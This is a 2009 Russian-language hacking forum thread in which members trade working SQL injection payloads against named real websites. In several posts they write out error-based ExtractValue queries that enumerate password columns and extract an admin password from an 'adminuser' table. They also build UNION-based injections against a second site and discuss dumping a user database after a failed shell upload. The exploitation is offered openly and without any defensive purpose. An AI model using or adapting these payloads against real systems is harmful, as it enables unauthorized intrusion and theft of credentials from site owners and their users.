Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. bons

    bons Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    286
    Likes Received:
    121
    Reputations:
    21
    Имеются в виду особые методы, позволяющие крутить слепую скулю почти с той же скроростью как и обычную если 5-ая ветка и вывод ошибок присутствуют
    https://forum.antichat.ru/showpost.php?p=1494443&postcount=11
    https://forum.antichat.ru/showpost.php?p=1494440&postcount=10
     
    #10601 bons, 11 Dec 2009
    Last edited: 11 Dec 2009
    1 person likes this.
  2. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 bons:

    Я говорил про тулзу, насколько бы "крутые" методы при блинде не были, автоматизация процесса потребуется по любому. Да, кое-чего в тулзе нет. Но и так бесплатно и многопоточно. Уж извините.
     
  3. Qwazar

    Qwazar Elder - Старейшина

    Joined:
    2 Jun 2005
    Messages:
    989
    Likes Received:
    904
    Reputations:
    587
    Pashkela, пусть к перспективным методам привыкают ;) А не бездумно пользуются программами.
     
  4. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Глупости. Мало того, что это не даёт абсолютно никаких знаний это ещё палит себя кучей запросов ненужных. В данном конкретном случае точно.

    Наверное проще получать ту же version() посылая один запрос вместо тупого, да ещё и неоптимального перебора. Как впрочем и остальные данные. Дампить всю базу что-бы получить акк админа это БРЕД. И неоправданное палево. Акк админа получается тремя запросами, а твой софт засрёт все логи
     
    #10604 Kakoytoxaker, 11 Dec 2009
    Last edited: 11 Dec 2009
  5. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    2 jokester:

    Скорее всего ты прав. Просто предложил человеку то, что у меня есть на текущий момент, включая первоначальные данные в качестве доказательства. Ничего другого адекватного ему, на мой взгляд сугубо, ему никто не предложил, кроме как "почитать что-то". Вместо того, чтобы новейшие и актуальнейшие методы продемонстрировать на конкретном примере по запросу автора вопроса - на конкретном сайте. Так что считаю в данном случае от меня пользы больше, чем от флуда выше.

    Блинда все-таки, а не очередной unhex(hex())
     
    #10605 Pashkela, 11 Dec 2009
    Last edited: 11 Dec 2009
  6. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Это не блайнд в том-то всё и дело, а не предложил...

    Ну я например уже задолбался одно и то-же из пустого в порожнее, каждый божий день. Вот и не предложил. Читать ведь нехотят. А с твоим софтом и не захотят.

    Ок. Предложение:
    1
    http://www.trcc.cc.mo.us/newsdetail.php?ID=156'/**/and/**/ExtractValue(1,concat(0x5c,(select group_concat(concat_ws(0x3a,table_schema,table_name,column_name)) from information_schema.columns+where+column_name+LIKE+CHAR(37,112,97,115,37) limit 1)))--+
    2
    http://www.trcc.cc.mo.us/newsdetail.php?ID=156'/**/and/**/ExtractValue(1,concat(0x5c,(select+group_concat(column_name)+from+information_schema.columns+where+table_name='adminuser'+limit+1)))--+

    Внимание интрига! Составьте третий запрос сами!!!
     
    7 people like this.
  7. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Ну нифига себе, до такого ведь обычному читателю этой темы труднова-то будет додуматься (включая меня). Так что конечно риспект:) Нет бы сразу

    Третий запрос наверное такой, извините мне мою наглость:
    Code:
    http://www.trcc.cc.mo.us/newsdetail.php?ID=156'/**/and/**/ExtractValue(1,concat(0x5c,(select%20USR_Password%20from%20trccweb.adminuser%20limit%200,1)))--+
    
    PS: Аплодирую стоя
     
    #10607 Pashkela, 11 Dec 2009
    Last edited: 11 Dec 2009
  8. [x60]unu

    [x60]unu Banned

    Joined:
    7 May 2009
    Messages:
    98
    Likes Received:
    498
    Reputations:
    163
    http://www.trcc.cc.mo.us/newsdetail.php?ID=156'/**/and/**/ExtractValue(1,concat(0x3a,(version())))--+
    гениально
    пашкела, что ты то пытался со своим запросом чудить, ведь мон было просто и так
    http://www.trcc.cc.mo.us/newsdetail.php?ID=156'+and+substring(version(),1,1)=5/**/and/**/'1'='1
     
    1 person likes this.
  9. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    ну и чем твой запрос отличается от моего в принципе? Перестановкой and or 1=1? Смешно

    PS: А, понял, типо в твоем БОЛЕЕ очевидно, что 5-я ветка. Ну мейби, мейби, типо меньше глаза ломать. Но у меня зато не надо думать о кавычках и последовательности их закрытия, т.к. просто вызываем ошибку и дальше все стандартно (тут все-таки не диссер пишем, а наводим чела на хотя бы правильное решение. Ты еще шелл предложи ему залить просто так:) ) Вот джок молодец, я такого раньше и не слыхал.
     
    #10609 Pashkela, 11 Dec 2009
    Last edited: 11 Dec 2009
    1 person likes this.
  10. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Pashkela, ну да, статьи то читать это же только для крутых цветных дядек
     
    1 person likes this.
  11. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    Да-да, вы все правы несомненно. Пойду читать. Ибо, как я понял, просто помочь уже не катит, надо подсказать максимально эффективно. Но радует такая придирчивость, честно. Так правдами и неправдами действительно хоть чему-то научиться можно.

    PS: Только в бошку оно быстрее и надежнее влезает на живых примерах-то.
     
    #10611 Pashkela, 11 Dec 2009
    Last edited: 11 Dec 2009
  12. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    Чем можно сдампить БД юзеров,где больше 10к записей? Ни SSD/SQL Helper не катят...
     
  13. Root-access

    Root-access Elder - Старейшина

    Joined:
    18 Jun 2008
    Messages:
    193
    Likes Received:
    195
    Reputations:
    91

    Доступ к шеллу есть? Если mysql бд, то mysql-dump
     
    1 person likes this.
  14. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    Root-access, шелл залить не получается, видимо права...
    может быть посредствам командной строке возможно это сделать?
     
  15. shellz[21h]

    shellz[21h] Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    311
    Likes Received:
    68
    Reputations:
    6
    что не понятно, что человеку надо сдампить через sqlinj :)
     
  16. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Доброго времени суток.
    Есть проблема:
    http://vb.by/author.php?topic=11&author=9'
    Выдеёт:
    SQL request caused an error.
    You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

    http://vb.by/author.php?topic=11&author=-1
    Выдаёт:
    SQL request caused an error. You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND project_id<>1 AND project_id<>2 ORDER BY `date` DESC LIMIT 0, 15' at line 1

    Пробую найти колво столбцов:
    http://vb.by/author.php?topic=11&author=-1+UNION+Select+1%20--%20
    Страницу открывает, в исх коде в самом конце пришет:
    SQL request caused an error. The used SELECT statements have a different number of columns

    Потаюсь подобрать дальше:
    http://vb.by/author.php?topic=11&author=-1+UNION+Select+1,2%20--%20
    Открывает страничку на которой только написано:
    SQL request caused an error. The used SELECT statements have a different number of columns

    Написал прогу чтобы вручную не перебирать, и сколько бы я не брал столюцов пишет different number of columns


    Что ето может быть такое???
     
  17. geezer.code

    geezer.code Elder - Старейшина

    Joined:
    22 Jan 2007
    Messages:
    552
    Likes Received:
    358
    Reputations:
    90
    не нужно гадать.
    http://vb.by/author.php?topic=11&author=1+and+1=2+union+select+version()--+

    хорошо конечно знать новые методы, но может сначала поискать "обычный" вывод?
     
  18. M.W.N.N.

    M.W.N.N. Member

    Joined:
    5 Jan 2009
    Messages:
    173
    Likes Received:
    78
    Reputations:
    6
    Code:
    http://vb.by/author.php?topic=11&author=9+union+select+version%28%29+limit+1,1--+
     
  19. Seravin

    Seravin Active Member

    Joined:
    25 Nov 2009
    Messages:
    475
    Likes Received:
    190
    Reputations:
    221
    Так я искал, но такой запрос вызывает ошибку! Сорри я прост немного ещё в жтом не разьераюсь... учусь... Если есть возможность напиши плиз в аську 553226859
     
  20. .:[melkiy]:.

    .:[melkiy]:. Elder - Старейшина

    Joined:
    25 Jan 2009
    Messages:
    355
    Likes Received:
    314
    Reputations:
    163
    Вывод в тайтл :)

    Code:
    <title>Вечерний Брест: Авторы: 5.0.51a-log</title>
     
Thread Status:
Not open for further replies.